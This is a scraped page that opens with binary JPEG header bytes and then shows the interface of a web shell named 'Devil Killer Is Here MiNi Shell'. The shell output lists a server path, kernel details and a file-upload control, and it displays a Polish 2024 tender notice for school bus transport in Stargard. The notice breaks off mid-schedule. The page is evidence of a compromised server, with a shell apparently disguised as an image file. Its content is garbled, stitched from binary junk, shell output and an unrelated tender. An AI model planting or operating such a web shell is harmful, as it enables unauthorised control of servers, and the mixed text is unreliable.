JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240730/0043709101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przewóz uczniów z terenu gminy Stargard do SP Małkocin , SP Grzędzice, SP Pęzino oraz przewozy dodatkowe wraz z zapewnieniem im opieki w okresie od 02.09.2024 r. do 27.06.2025 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Ośrodek Administracyjny Szkół Gminy Stargard</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 810819813</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bydgoska 63</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stargard</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">73-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL428 - Szczeciński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@oas.stargard.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.oas.stargard.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przewóz uczniów z terenu gminy Stargard do SP Małkocin , SP Grzędzice, SP Pęzino oraz przewozy dodatkowe wraz z zapewnieniem im opieki w okresie od 02.09.2024 r. do 27.06.2025 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3b862817-af46-4a80-9be4-9ad2c9f57504</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00437091</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00093940/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Przewóz uczniów z terenu gminy Stargard do SP Małkocin , SP Grzędzice, SPPęzino oraz przewozy dodatkowe wraz z zapewnieniem im opieki</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/all?query=O%C5%9Brodek%20Administracyjny%20Szk%C3%B3%C5%82%20Gminy%20Stargard <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się za pośrednictwem platformy do obsługi postępowań przetargowych, dostępnej pod adresem: https://platformazakupowa.pl/all?query=O%C5%9Brodek%20Administracyjny%20Szk%C3%B3%C5%82%20Gminy%20Stargard<br/>(zwanej dalej „Platformą”).<br/>2) Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres email:zamowienia@oas.stargard.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne korzystania z Platformy określa regulamin platformy (dostępny pod adresem: http://platformazakupowa.pl/strona/1-regulamin) oraz instrukcje dla Wykonawców (dostępne pod adresem: https://platformazakupowa.pl/strona/46-instrukcje) Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z Platformy, określone w Regulaminie oraz uznaje go za wiążący.<br/>5)Sposób sporządzenia podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452). W zakresie nieuregulowanym w SWZ, w zakresie dokumentów i oświadczeń w nim wymienionych, zastosowanie mają przepisy PZP, ww. rozporządzenia oraz Rozporządzenia z dnia 30 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy (Dz. U. z 2020 r. poz. 2415).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I. Przewóz uczniów do i ze Szkoły Podstawowej w Małkocinie – średnia miesięczna liczba przejechanych kilometrów – około 2740 km natomiast w czasie trwania remontu szkoły średnia miesięczna liczba przejechanych kilometrów – około 3800 km<br/><br/>Przewóz obejmuje uczniów z miejscowości: Warchlino (9 uczniów), Warchlinko (10 uczniów, Siwkowo (3 uczniów), Kiczarowo (28 uczniów), Grabowo (38 uczniów). Łącznie 88 uczniów.<br/><br/>Plan przewozów uczniów przedstawia się następująco:<br/><br/>Przywóz od poniedziałku do piątku – 42 km<br/>7:00- Warchlino<br/>7:05 Warchlinko<br/>7:10 – Siwkowo<br/>7:15 – SP Małkocin<br/>7:25 - Kol. Kiczarowo<br/>7:30 – Kiczarowo<br/>7:35 – Kol. Grabowo Górna<br/>7:45 – Grabowo<br/>7:50 – Kol. Grabowo Dolna<br/>8:00 - SP Małkocin<br/><br/>Odwóz I od poniedziałku do piątku – 53 km<br/><br/>13:00 – SP Małkocin<br/>13:05 – Siwkowo<br/>13:10 – Warchlino<br/>13:15 – Warchlinko<br/>13:25 – SP Małkocin<br/>13:35 – Kol. Grabowo Dolna<br/>13:40 - Grabowo<br/>13:45 - Kol. Grabowo Górna<br/>13:50 – Kiczarowo<br/>13:55 - Kol. Kiczarowo<br/>14:10 - SP Małkocin<br/><br/>Odwóz II od poniedziałku do piątku – 42 km, w jednym dniu tygodnia II odwóz będzie rozpoczynał się o godzinie 15:40, natomiast w czasie remontu szkoły będzie rozpoczynał się codziennie o godzinie 15:40.<br/><br/>14:40 – SP Małkocin<br/>14:45 – Siwkowo<br/>14:50 – Warchlino<br/>14:55 – Warchlinko<br/>15:00 – SP Małkocin<br/>15:15 – Kol. Grabowo Dolna<br/>15:20 – Grabowo<br/>15:25 – Kol. Grabowo Górna<br/>15:30 - Kiczarowo<br/>15:35 – Kol. Kiczarowo<br/><br/>Szacowana dzienna liczba km wg planu przewozu 137 km. Liczba km nie obejmuje dojazdu do miejsca początkowego trasy oraz zjazdu z końcowego miejsca trasy. Przewiduje się około 186 dni nauki szkolnej. W związku z planowanym remontem starego budynku szkoły Zamawiający przewiduje konieczność zwiększenia ilości przywozów uczniów do dwóch przywozów dziennie, a tym samym zwiększenia dziennej liczby km do 190 km do czasu zakończenia prac remontowych tj. około 4 miesiące od czasu rozpoczęcia remontu. Drugi przywóz uczniów do szkoły w czasie trwania remontu będzie odbywał się na godzinę 10:30. W ciągu roku szkolnego w dniach wolnych od zajęć dydaktycznych, a także związanych z obchodami świąt religijnych, państwowych i szkolnych Zamawiający przewiduje zmiany w planie zajęć i co za tym idzie zmniejszenie liczby km w tych dniach. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II Przewóz uczniów do i ze Szkoły Podstawowej w Grzędzicach – średnia miesięczna liczba przejechanych km – około 2750 km.<br/><br/>Przewóz uczniów obejmuje miejscowości : Koszewo (5 uczniów), Koszewko (0 uczeń), Wierzchląd (1 uczniów), Skalin (6 uczniów), Lipnik (16 uczniów), Żarowo (39 uczniów), Lubowo (13 uczniów), Grzędzice Majątek ( 11 uczniów). Łącznie 91 uczniów.<br/><br/>Plan przewozów uczniów przedstawia się następująco:<br/><br/>PONIEDZIAŁEK, WTOREK, ŚRODA<br/>Przywóz I Kierunek KOSZEWO <br/>Koszewo – 6:30 <br/>Koszewko- 6:35<br/>Wierzchląd – 6:40 <br/>Skalin – 6:45 <br/>Lipnik – 6:50 <br/>SP Grzędzice – 6:55 <br/><br/>Przywóz II	Kierunek LUBOWO <br/>	Lubowo – 7:05 Żarowo -7:10 <br/>	Grzędzice Majątek - 7:15 <br/>SP Grzędzice - 7:25<br/><br/>Odwóz I Kierunek LUBOWO <br/>	SP Grzędzice – 13:20 <br/>	Grzędzice Majątek -13:30 <br/>	Żarowo – 13:35 <br/>	Lubowo – 13:50	<br/> <br/>Odwóz II Kierunek LUBOWO <br/>SP Grzędzice- 14:55<br/>Grzędzice Majątek – 15:05<br/>Żarowo- 15:10<br/>Lubowo- 15:15<br/><br/>Odwóz I Kierunek KOSZEWO <br/>SP Grzędzice – 14:05 <br/>Lipnik – 14:10 <br/>Skalin – 14:15 <br/>Wierzchląd – 14:20 <br/>Koszewko – 14:25 <br/>Koszewo – 14:30<br/><br/>Odwóz II Kierunek Koszewo <br/>SP Grzędzice – 15:30 <br/>Lipnik – 15:35 <br/>Skalin – 15:40 <br/>Wierzchląd – 15:45 <br/>Koszewko – 15:50 <br/>Koszewo – 15:55<br/><br/>CZWARTEK, PIĄTEK<br/>Przywóz I Kierunek KOSZEWO <br/>Koszewo – 6:30 <br/>Koszewko- 6:35<br/>Wierzchląd – 6:40 <br/>Skalin – 6:45 <br/>Lipnik – 6:50 <br/>SP Grzędzice – 6:55 <br/><br/>Przywóz I	Kierunek LUBOWO <br/>	Lubowo – 7:05 Żarowo -7:10 <br/>	Grzędzice Majątek - 7:15 <br/>SP Grzędzice - 7:25<br/><br/>Przywóz II Kierunek KOSZEWO <br/>Koszewo – 10:10 <br/>Koszewko- 10:15<br/>Wierzchląd – 10:20 <br/>Skalin – 10:25 <br/>Lipnik – 10:30 <br/>SP Grzędzice – 10:35<br/><br/>Przywóz II	Kierunek LUBOWO <br/>	Lubowo – 10:45 Żarowo -10:50 <br/>	Grzędzice Majątek - 11:00 <br/>SP Grzędzice - 11:05<br/>	<br/><br/>Odwóz I Kierunek LUBOWO <br/>	SP Grzędzice – 14:55 <br/>	Grzędzice Majątek -15:05 <br/>	Żarowo – 15:10 <br/>	Lubowo – 15:15	<br/> <br/>Odwóz I Kierunek KOSZEWO <br/>SP Grzędzice – 15:45 <br/>Lipnik – 15:50 <br/>Skalin – 15:55 <br/>Wierzchląd – 16:00 <br/>Koszewko – 16:05 <br/>Koszewo – 16:10<br/><br/>Odwóz II Kierunek LUBOWO <br/>SP Grzędzice- 16:35<br/>Grzędzice Majątek – 16:45<br/>Żarowo- 16:50<br/>Lubowo- 16:55<br/><br/>Odwóz II Kierunek Koszewo <br/>SP Grzędzice – 17:10 <br/>Lipnik – 17:15 <br/>Skalin – 17:20 <br/>Wierzchląd – 17:25 <br/>Koszewko – 17:30 <br/>Koszewo – 17:35<br/><br/>Szacowana dzienna liczba km wg planu przewozu w I i II semestrze wynosi 137,5 km. Zamawiający przewiduje możliwość zwiększenia dziennej liczby km do 165 km w przypadku zmiany planu przewozu w wyniku zmiany planu lekcji. Liczba km nie obejmuje dojazdu do miejsca początkowego trasy oraz zjazdu z końcowego miejsca trasy.<br/>Przewiduje się 186 dni nauki szkolnej. W ciągu roku szkolnego w dniach wolnych od zajęć dydaktycznych , a także związanych z obchodami świąt religijnych, państwowych, i szkolnych Zamawiający przewiduje zmiany w planie zajęć i co za tym idzie zmniejszenie liczby km w tych dniach. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część III. Przewóz uczniów do i ze Szkoły Podstawowej w Pęzinie – średnia miesięczna liczba przejechanych kilometrów – około 3000 km.<br/>Przewóz obejmuje następujące miejscowości: Barzkowice (7 uczniów), Golina (10 uczniów), Ulikowo (33 uczniów), Krąpiel (62 uczniów), Trzebiatów (26 uczniów). Łącznie 138 uczniów. <br/><br/>Plan przewozów uczniów przedstawia się następująco:<br/>PRZEWOZY PONIEDZIAŁEK<br/>PRZYWOZY<br/>I AUTOBUS PRZYWÓZ <br/>Krąpiel- 7:15<br/>Trzebiatów – 7:20<br/>SP Pęzino – 7:30<br/>Krąpiel – 7:35<br/>Trzebiatów – 7:40<br/>SP Pęzino - 7:50<br/><br/>Trzebiatów – 9:50<br/>Krąpiel – 10:15<br/>Trzebiatów – 10:20<br/>SP Pęzino – 10:25<br/><br/><br/>II AUTOBUS PRZYWOZY <br/>Barzkowice – 7:20<br/>Golina – 7:25<br/>SP Pęzino – 7:40<br/>Ulikowo – 7:45<br/>SP Pęzino – 7:55<br/><br/><br/>ODWOZY<br/><br/>I AUTOBUS ODWOZY <br/><br/><br/>SP Pęzino - 12:35<br/>Ulikowo – 12:40<br/>Golina – 12:50<br/>Barzkowice – 13:00<br/>SP Pęzino – 13:10<br/><br/>SP Pęzino – 14:25<br/>Ulikowo – 14:30<br/>SP Pęzino – 14:40<br/>Golina – 14:55<br/>Barzkowice – 15:00<br/>SP Pęzino – 15:15<br/><br/>SP Pęzino – 14:25<br/>Trzebiatów – 14:30<br/>Krąpiel -14:35<br/>SP Pęzino – 14:45<br/><br/>SP Pęzino – 15:15<br/>Trzebiatów – 15:20<br/>Krąpiel – 15:25<br/><br/><br/>PRZEWOZY WTOREK<br/>PRZYWOZY<br/>I AUTOBUS<br/>Krąpiel- 7:15<br/>Trzebiatów – 7:20<br/>SP Pęzino – 7:30<br/>Krąpiel – 7:35<br/>Trzebiatów – 7:40<br/>SP Pęzino - 7:50<br/><br/>Barzkowice – 9:55<br/>Golina – 10:00<br/>SP Pęzino – 10:15<br/>Ulikowo – 10:20<br/>SP Pęzino – 10:30<br/><br/>II AUTOBUS<br/>Barzkowice – 7:20<br/>Golina – 7:25<br/>SP Pęzino – 7:40<br/>Ulikowo – 7:45<br/>SP Pęzino – 7:55<br/><br/>ODWOZY<br/>I AUTOBUS<br/>SP Pęzino – 12:35<br/>Trzebiatów – 12:40<br/>Krąpiel – 12:45<br/>SP Pęzino – 12:55<br/><br/>SP Pęzino – 13:30<br/>Trzebiatów – 13:35<br/>Krąpiel – 13:40<br/>SP Pęzino – 13:50<br/><br/>SP Pęzino – 14:25<br/>Trzebiatów – 14:33<br/>Krąpiel – 14:35<br/><br/><br/>II AUTOBUS<br/>SP Pęzino – 14:25<br/>Ulikowo – 14:30<br/>Golina – 14:40<br/>Barzkowice – 14:45<br/>SP Pęzino – 15:00<br/><br/>SP Pęzino – 15:15<br/>Ulikowo – 15:20<br/>Golina – 15:30<br/>Barzkowice – 15:35<br/>Trzebiatów – 15:45<br/>Krąpiel – 15:50<br/><br/>PRZEWOZY ŚRODA<br/>PRZYWOZY<br/><br/>I AUTOBUS<br/>Krąpiel- 7:15<br/>Trzebiatów – 7:20<br/>SP Pęzino – 7:30<br/>Krąpiel – 7:35<br/>Trzebiatów – 7:40<br/>SP Pęzino - 7:50<br/><br/>Krąpiel – 10:15<br/>Trzebiatów – 10:20<br/>SP Pęzino – 10:25<br/><br/>II AUTOBUS PRZYWOZY <br/>Barzkowice – 7:20<br/>Golina – 7:25<br/>SP Pęzino – 7:30<br/>Ulikowo – 7:45<br/>SP Pęzino – 7:55<br/><br/>ODWOZY<br/><br/>SP Pęzino - 12:35<br/>Ulikowo – 12:40<br/>Golina – 12:50<br/>Barzkowice – 13:00<br/>SP Pęzino – 13:10<br/><br/><br/>SP Pęzino – 14:25<br/>Ulikowo – 14:30<br/>SP Pęzino – 14:40<br/>Golina – 14:55<br/>Barzkowice – 15:00<br/>SP Pęzino – 15:15<br/><br/>SP Pęzino – 15:15<br/>Trzebiatów – 15:20<br/>Krąpiel – 15:30<br/><br/>II AUTOBUS<br/>SP Pęzino – 14:25<br/>Trzebiatów – 14:30<br/>Krąpiel – 14:35<br/><br/>PRZEWOZY CZWARTEK<br/><br/>PRZYWOZY<br/><br/>I AUTOBUS<br/>Krąpiel- 7:15<br/>Trzebiatów – 7:20<br/>SP Pęzino – 7:30<br/>Krąpiel – 7:35<br/>Trzebiatów – 7:40<br/>SP Pęzino - 7:50<br/><br/>Barzkowice – 9:55<br/>Golina – 10:00<br/>SP Pęzino – 10:15<br/>Ulikowo – 10:20<br/>SP Pęzino – 10:30<br/><br/>II AUTOBUS<br/>Barzkowice – 7:20<br/>Golina – 7:25<br/>SP Pęzino – 7:40<br/>Ulikowo – 7:45<br/>SP Pęzino – 7:55<br/><br/>ODWOZY<br/><br/>I AUTOBUS<br/>SP Pęzino – 12:35<br/>Trzebiatów – 12:40<br/>Krąpiel – 12:45<br/>SP Pęzino – 12:55<br/><br/>SP Pęzino – 13:30<br/>Ulikowo – 13:35<br/>Golina – 13:50<br/>Barzkowice – 